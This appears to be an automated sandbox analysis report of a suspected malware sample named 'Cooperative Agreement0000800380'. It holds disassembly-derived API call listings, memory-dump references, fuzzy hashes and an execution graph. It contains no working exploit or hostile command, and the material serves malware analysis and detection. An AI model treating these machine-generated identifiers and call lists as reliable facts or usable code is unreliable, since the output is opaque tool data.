                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID: $0A
                                                                                                                                                                                                                                        • API String ID: 626452242-513306843
                                                                                                                                                                                                                                        • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                                        • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 830345296-0
                                                                                                                                                                                                                                        • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                                        • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 0040E145
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(02390000,00000000,0000000A), ref: 0040E169
                                                                                                                                                                                                                                        • HeapReAlloc.KERNEL32(02390000,00000000,00000000,0000000A), ref: 0040E18D
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(02390000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Alloc$Freewcslen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2479713791-0
                                                                                                                                                                                                                                        • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                                        • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                                                                                                                                                                                                                        • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                                          • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 830345296-0
                                                                                                                                                                                                                                        • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                                        • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1298188129-0
                                                                                                                                                                                                                                        • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                                        • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                                                                                                                                                                                                                          • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                                          • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                                          • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4254243056-0
                                                                                                                                                                                                                                        • Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                                        • Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:9.5%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0.6%
                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                        Total number of Limit Nodes:26
                                                                                                                                                                                                                                        execution_graph 19792 7ff69437f9fc 19793 7ff69437fbee 19792->19793 19796 7ff69437fa3e _isindst 19792->19796 19794 7ff694374f78 memcpy_s 11 API calls 19793->19794 19812 7ff69437fbde 19794->19812 19795 7ff69436c5c0 _log10_special 8 API calls 19797 7ff69437fc09 19795->19797 19796->19793 19798 7ff69437fabe _isindst 19796->19798 19813 7ff694386204 19798->19813 19803 7ff69437fc1a 19805 7ff69437a970 _isindst 17 API calls 19803->19805 19807 7ff69437fc2e 19805->19807 19810 7ff69437fb1b 19810->19812 19838 7ff694386248 19810->19838 19812->19795 19814 7ff694386213 19813->19814 19815 7ff69437fadc 19813->19815 19845 7ff694380348 EnterCriticalSection 19814->19845 19820 7ff694385608 19815->19820 19821 7ff694385611 19820->19821 19825 7ff69437faf1 19820->19825 19822 7ff694374f78 memcpy_s 11 API calls 19821->19822 19823 7ff694385616 19822->19823 19824 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19823->19824 19824->19825 19825->19803 19826 7ff694385638 19825->19826 19827 7ff69437fb02 19826->19827 19828 7ff694385641 19826->19828 19827->19803 19832 7ff694385668 19827->19832 19829 7ff694374f78 memcpy_s 11 API calls 19828->19829 19830 7ff694385646 19829->19830 19831 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19830->19831 19831->19827 19833 7ff69437fb13 19832->19833 19834 7ff694385671 19832->19834 19833->19803 19833->19810 19835 7ff694374f78 memcpy_s 11 API calls 19834->19835 19836 7ff694385676 19835->19836 19837 7ff69437a950 _invalid_parameter_noinfo 37 API calls 19836->19837 19837->19833 19846 7ff694380348 EnterCriticalSection 19838->19846 20112 7ff694375480 20113 7ff69437548b 20112->20113 20121 7ff69437f314 20113->20121 20134 7ff694380348 EnterCriticalSection 20121->20134 19709 7ff69437c590 19720 7ff694380348 EnterCriticalSection 19709->19720 18866 7ff694375698 18867 7ff6943756b2 18866->18867 18868 7ff6943756cf 18866->18868 18869 7ff694374f58 _fread_nolock 11 API calls 18867->18869 18868->18867 18870 7ff6943756e2 CreateFileW 18868->18870 18871 7ff6943756b7 18869->18871 18872 7ff69437574c 18870->18872 18873 7ff694375716 18870->18873 18874 7ff694374f78 memcpy_s 11 API calls 18871->18874 18917 7ff694375c74 18872->18917 18891 7ff6943757ec GetFileType 18873->18891 18877 7ff6943756bf 18874->18877 18882 7ff69437a950 _invalid_parameter_noinfo 37 API calls 18877->18882 18880 7ff694375755 18885 7ff694374eec _fread_nolock 11 API calls 18880->18885 18881 7ff694375780 18938 7ff694375a34 18881->18938 18887 7ff6943756ca 18882->18887 18883 7ff69437572b CloseHandle 18883->18887 18884 7ff694375741 CloseHandle 18884->18887 18890 7ff69437575f 18885->18890 18890->18887 18892 7ff69437583a 18891->18892 18893 7ff6943758f7 18891->18893 18896 7ff694375866 GetFileInformationByHandle 18892->18896 18897 7ff694375b70 21 API calls 18892->18897 18894 7ff694375921 18893->18894 18895 7ff6943758ff 18893->18895 18901 7ff694375944 PeekNamedPipe 18894->18901 18916 7ff6943758e2 18894->18916 18898 7ff694375912 GetLastError 18895->18898 18899 7ff694375903 18895->18899 18896->18898 18900 7ff69437588f 18896->18900 18906 7ff694375854 18897->18906 18904 7ff694374eec _fread_nolock 11 API calls 18898->18904 18902 7ff694374f78 memcpy_s 11 API calls 18899->18902 18903 7ff694375a34 51 API calls 18900->18903 18901->18916 18902->18916 18907 7ff69437589a 18903->18907 18904->18916 18905 7ff69436c5c0 _log10_special 8 API calls 18908 7ff694375724 18905->18908 18906->18896 18906->18916 18955 7ff694375994 18907->18955 18908->18883 18908->18884 18911 7ff694375994 10 API calls 18912 7ff6943758b9 18911->18912 18913 7ff694375994 10 API calls 18912->18913 18914 7ff6943758ca 18913->18914 18915 7ff694374f78 memcpy_s 11 API calls 18914->18915 18914->18916 18915->18916 18916->18905 18918 7ff694375caa 18917->18918 18919 7ff694374f78 memcpy_s 11 API calls 18918->18919 18937 7ff694375d42 __std_exception_destroy 18918->18937 18921 7ff694375cbc 18919->18921 18920 7ff69436c5c0 _log10_special 8 API calls 18922 7ff694375751 18920->18922 18923 7ff694374f78 memcpy_s 11 API calls 18921->18923 18922->18880 18922->18881 18924 7ff694375cc4 18923->18924 18925 7ff694377e78 45 API calls 18924->18925 18926 7ff694375cd9 18925->18926 18927 7ff694375ceb 18926->18927 18928 7ff694375ce1 18926->18928 18930 7ff694374f78 memcpy_s 11 API calls 18927->18930 18929 7ff694374f78 memcpy_s 11 API calls 18928->18929 18936 7ff694375ce6 18929->18936 18931 7ff694375cf0 18930->18931 18932 7ff694374f78 memcpy_s 11 API calls 18931->18932 18931->18937 18933 7ff694375cfa 18932->18933 18934 7ff694377e78 45 API calls 18933->18934 18934->18936 18935 7ff694375d34 GetDriveTypeW 18935->18937 18936->18935 18936->18937 18937->18920 18939 7ff694375a5c 18938->18939 18947 7ff69437578d 18939->18947 18962 7ff69437f794 18939->18962 18941 7ff694375af0 18942 7ff69437f794 51 API calls 18941->18942 18941->18947 18943 7ff694375b03 18942->18943 18944 7ff69437f794 51 API calls 18943->18944 18943->18947 18945 7ff694375b16 18944->18945 18946 7ff69437f794 51 API calls 18945->18946 18945->18947 18946->18947 18948 7ff694375b70 18947->18948 18949 7ff694375b8a 18948->18949 18950 7ff694375bc1 18949->18950 18951 7ff694375b9a 18949->18951 18952 7ff69437f628 21 API calls 18950->18952 18953 7ff694374eec _fread_nolock 11 API calls 18951->18953 18954 7ff694375baa 18951->18954 18952->18954 18953->18954 18954->18890 18956 7ff6943759bd FileTimeToSystemTime 18955->18956 18957 7ff6943759b0 18955->18957 18958 7ff6943759d1 SystemTimeToTzSpecificLocalTime 18956->18958 18959 7ff6943759b8 18956->18959 18957->18956 18957->18959 18958->18959 18960 7ff69436c5c0 _log10_special 8 API calls 18959->18960 18961 7ff6943758a9 18960->18961 18961->18911 18963 7ff69437f7a1 18962->18963 18964 7ff69437f7c5 18962->18964 18963->18964 18965 7ff69437f7a6 18963->18965 18966 7ff69437f7ff 18964->18966 18969 7ff69437f81e 18964->18969 18967 7ff694374f78 memcpy_s 11 API calls 18965->18967 18968 7ff694374f78 memcpy_s 11 API calls 18966->18968 18970 7ff69437f7ab 18967->18970 18971 7ff69437f804 18968->18971 18972 7ff694374fbc 45 API calls 18969->18972 18973 7ff69437a950 _invalid_parameter_noinfo 37 API calls 18970->18973 18974 7ff69437a950 _invalid_parameter_noinfo 37 API calls 18971->18974 18977 7ff69437f82b 18972->18977 18975 7ff69437f7b6 18973->18975 18976 7ff69437f80f 18974->18976 18975->18941 18976->18941 18977->18976 18978 7ff69438054c 51 API calls 18977->18978 18978->18977 20615 7ff694381720 20626 7ff694387454 20615->20626 20627 7ff694387461 20626->20627 20628 7ff69437a9b8 __free_lconv_mon 11 API calls 20627->20628 20629 7ff69438747d 20627->20629 20628->20627 20630 7ff69437a9b8 __free_lconv_mon 11 API calls 20629->20630 20631 7ff694381729 20629->20631 20630->20629 20632 7ff694380348 EnterCriticalSection 20631->20632 16057 7ff69436ccac 16078 7ff69436ce7c 16057->16078 16060 7ff69436cdf8 16232 7ff69436d19c IsProcessorFeaturePresent 16060->16232 16061 7ff69436ccc8 __scrt_acquire_startup_lock 16063 7ff69436ce02 16061->16063 16068 7ff69436cce6 __scrt_release_startup_lock 16061->16068 16064 7ff69436d19c 7 API calls 16063->16064 16066 7ff69436ce0d __FrameHandler3::FrameUnwindToEmptyState 16064->16066 16065 7ff69436cd0b 16067 7ff69436cd91 16084 7ff69436d2e4 16067->16084 16068->16065 16068->16067 16221 7ff694379b9c 16068->16221 16070 7ff69436cd96 16087 7ff694361000 16070->16087 16075 7ff69436cdb9 16075->16066 16228 7ff69436d000 16075->16228 16079 7ff69436ce84 16078->16079 16080 7ff69436ce90 __scrt_dllmain_crt_thread_attach 16079->16080 16081 7ff69436ccc0 16080->16081 16082 7ff69436ce9d 16080->16082 16081->16060 16081->16061 16082->16081 16239 7ff69436d8f8 16082->16239 16266 7ff69438a540 16084->16266 16088 7ff694361009 16087->16088 16268 7ff6943754f4 16088->16268 16090 7ff6943637fb 16275 7ff6943636b0 16090->16275 16093 7ff694363808 __std_exception_destroy 16485 7ff69436c5c0 16093->16485 16097 7ff69436391b 16451 7ff6943645b0 16097->16451 16098 7ff69436383c 16442 7ff694361c80 16098->16442 16102 7ff69436385b 16347 7ff694368a20 16102->16347 16105 7ff69436396a 16474 7ff694362710 16105->16474 16107 7ff69436388e 16116 7ff6943638bb __std_exception_destroy 16107->16116 16446 7ff694368b90 16107->16446 16109 7ff69436395d 16110 7ff694363962 16109->16110 16111 7ff694363984 16109->16111 16470 7ff6943700bc 16110->16470 16112 7ff694361c80 49 API calls 16111->16112 16115 7ff6943639a3 16112->16115 16121 7ff694361950 115 API calls 16115->16121 16117 7ff694368a20 14 API calls 16116->16117 16124 7ff6943638de __std_exception_destroy 16116->16124 16117->16124 16118 7ff694368b30 40 API calls 16119 7ff694363a0b 16118->16119 16120 7ff694368b90 40 API calls 16119->16120 16122 7ff694363a17 16120->16122 16123 7ff6943639ce 16121->16123 16125 7ff694368b90 40 API calls 16122->16125 16123->16102 16126 7ff6943639de 16123->16126 16124->16118 16130 7ff69436390e __std_exception_destroy 16124->16130 16127 7ff694363a23 16125->16127 16128 7ff694362710 54 API calls 16126->16128 16129 7ff694368b90 40 API calls 16127->16129 16128->16093 16129->16130 16131 7ff694368a20 14 API calls 16130->16131 16132 7ff694363a3b 16131->16132 16133 7ff694363b2f 16132->16133 16134 7ff694363a60 __std_exception_destroy 16132->16134 16135 7ff694362710 54 API calls 16133->16135 16138 7ff694363aab 16134->16138 16360 7ff694368b30 16134->16360 16135->16093 16137 7ff694368a20 14 API calls 16139 7ff694363bf4 __std_exception_destroy 16137->16139 16138->16137 16140 7ff694363c46 16139->16140 16141 7ff694363d41 16139->16141 16143 7ff694363cd4 16140->16143 16144 7ff694363c50 16140->16144 16494 7ff6943644d0 16141->16494 16145 7ff694368a20 14 API calls 16143->16145 16367 7ff6943690e0 16144->16367 16149 7ff694363ce0 16145->16149 16146 7ff694363d4f 16150 7ff694363d65 16146->16150 16151 7ff694363d71 16146->16151 16152 7ff694363c61 16149->16152 16155 7ff694363ced 16149->16155 16497 7ff694364620 16150->16497 16154 7ff694361c80 49 API calls 16151->16154 16157 7ff694362710 54 API calls 16152->16157 16163 7ff694363cc8 __std_exception_destroy 16154->16163 16158 7ff694361c80 49 API calls 16155->16158 16157->16093 16161 7ff694363d0b 16158->16161 16159 7ff694363dc4 16417 7ff694369400 16159->16417 16161->16163 16164 7ff694363d12 16161->16164 16163->16159 16165 7ff694363da7 SetDllDirectoryW LoadLibraryExW 16163->16165 16167 7ff694362710 54 API calls 16164->16167 16165->16159 16166 7ff694363dd7 SetDllDirectoryW 16169 7ff694363e0a 16166->16169 16210 7ff694363e5a 16166->16210 16167->16093 16170 7ff694368a20 14 API calls 16169->16170 16178 7ff694363e16 __std_exception_destroy 16170->16178 16171 7ff694363ffc 16173 7ff694364006 PostMessageW GetMessageW 16171->16173 16174 7ff694364029 16171->16174 16172 7ff694363f1b 16422 7ff6943633c0 16172->16422 16173->16174 16574 7ff694363360 16174->16574 16181 7ff694363ef2 16178->16181 16185 7ff694363e4e 16178->16185 16184 7ff694368b30 40 API calls 16181->16184 16184->16210 16185->16210 16500 7ff694366db0 16185->16500 16210->16171 16210->16172 16222 7ff694379bd4 16221->16222 16223 7ff694379bb3 16221->16223 18817 7ff69437a448 16222->18817 16223->16067 16226 7ff69436d328 GetModuleHandleW 16227 7ff69436d339 16226->16227 16227->16075 16229 7ff69436d011 16228->16229 16230 7ff69436cdd0 16229->16230 16231 7ff69436d8f8 7 API calls 16229->16231 16230->16065 16231->16230 16233 7ff69436d1c2 memcpy_s __FrameHandler3::FrameUnwindToEmptyState 16232->16233 16234 7ff69436d1e1 RtlCaptureContext RtlLookupFunctionEntry 16233->16234 16235 7ff69436d20a RtlVirtualUnwind 16234->16235 16236 7ff69436d246 memcpy_s 16234->16236 16235->16236 16237 7ff69436d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16236->16237 16238 7ff69436d2c6 __FrameHandler3::FrameUnwindToEmptyState 16237->16238 16238->16063 16240 7ff69436d90a 16239->16240 16241 7ff69436d900 16239->16241 16240->16081 16245 7ff69436dc94 16241->16245 16246 7ff69436dca3 16245->16246 16247 7ff69436d905 16245->16247 16253 7ff69436ded0 16246->16253 16249 7ff69436dd00 16247->16249 16250 7ff69436dd2b 16249->16250 16251 7ff69436dd0e DeleteCriticalSection 16250->16251 16252 7ff69436dd2f 16250->16252 16251->16250 16252->16240 16257 7ff69436dd38 16253->16257 16258 7ff69436de22 TlsFree 16257->16258 16263 7ff69436dd7c __vcrt_InitializeCriticalSectionEx 16257->16263 16259 7ff69436ddaa LoadLibraryExW 16260 7ff69436ddcb GetLastError 16259->16260 16261 7ff69436de49 16259->16261 16260->16263 16262 7ff69436de69 GetProcAddress 16261->16262 16264 7ff69436de60 FreeLibrary 16261->16264 16262->16258 16263->16258 16263->16259 16263->16262 16265 7ff69436dded LoadLibraryExW 16263->16265 16264->16262 16265->16261 16265->16263 16267 7ff69436d2fb GetStartupInfoW 16266->16267 16267->16070 16269 7ff69437f4f0 16268->16269 16271 7ff69437f596 16269->16271 16272 7ff69437f543 16269->16272 16597 7ff69437f3c8 16271->16597 16587 7ff69437a884 16272->16587 16274 7ff69437f56c 16274->16090 16704 7ff69436c8c0 16275->16704 16278 7ff6943636eb GetLastError 16711 7ff694362c50 16278->16711 16279 7ff694363710 16706 7ff6943692f0 FindFirstFileExW 16279->16706 16283 7ff694363706 16287 7ff69436c5c0 _log10_special 8 API calls 16283->16287 16284 7ff69436377d 16737 7ff6943694b0 16284->16737 16285 7ff694363723 16726 7ff694369370 CreateFileW 16285->16726 16290 7ff6943637b5 16287->16290 16289 7ff69436378b 16289->16283 16294 7ff694362810 49 API calls 16289->16294 16290->16093 16297 7ff694361950 16290->16297 16292 7ff69436374c __vcrt_InitializeCriticalSectionEx 16292->16284 16293 7ff694363734 16729 7ff694362810 16293->16729 16294->16283 16298 7ff6943645b0 108 API calls 16297->16298 16299 7ff694361985 16298->16299 16300 7ff694361c43 16299->16300 16301 7ff694367f80 83 API calls 16299->16301 16302 7ff69436c5c0 _log10_special 8 API calls 16300->16302 16303 7ff6943619cb 16301->16303 16304 7ff694361c5e 16302->16304 16346 7ff694361a03 16303->16346 17142 7ff694370744 16303->17142 16304->16097 16304->16098 16306 7ff6943700bc 74 API calls 16306->16300 16307 7ff6943619e5 16308 7ff6943619e9 16307->16308 16309 7ff694361a08 16307->16309 16311 7ff694374f78 memcpy_s 11 API calls 16308->16311 17146 7ff69437040c 16309->17146 16313 7ff6943619ee 16311->16313 17149 7ff694362910 16313->17149 16314 7ff694361a26 16317 7ff694374f78 memcpy_s 11 API calls 16314->16317 16315 7ff694361a45 16320 7ff694361a7b 16315->16320 16321 7ff694361a5c 16315->16321 16318 7ff694361a2b 16317->16318 16319 7ff694362910 54 API calls 16318->16319 16319->16346 16322 7ff694361c80 49 API calls 16320->16322 16323 7ff694374f78 memcpy_s 11 API calls 16321->16323 16324 7ff694361a92 16322->16324 16325 7ff694361a61 16323->16325 16326 7ff694361c80 49 API calls 16324->16326 16327 7ff694362910 54 API calls 16325->16327 16328 7ff694361add 16326->16328 16327->16346 16329 7ff694370744 73 API calls 16328->16329 16330 7ff694361b01 16329->16330 16331 7ff694361b16 16330->16331 16332 7ff694361b35 16330->16332 16333 7ff694374f78 memcpy_s 11 API calls 16331->16333 16334 7ff69437040c _fread_nolock 53 API calls 16332->16334 16335 7ff694361b1b 16333->16335 16336 7ff694361b4a 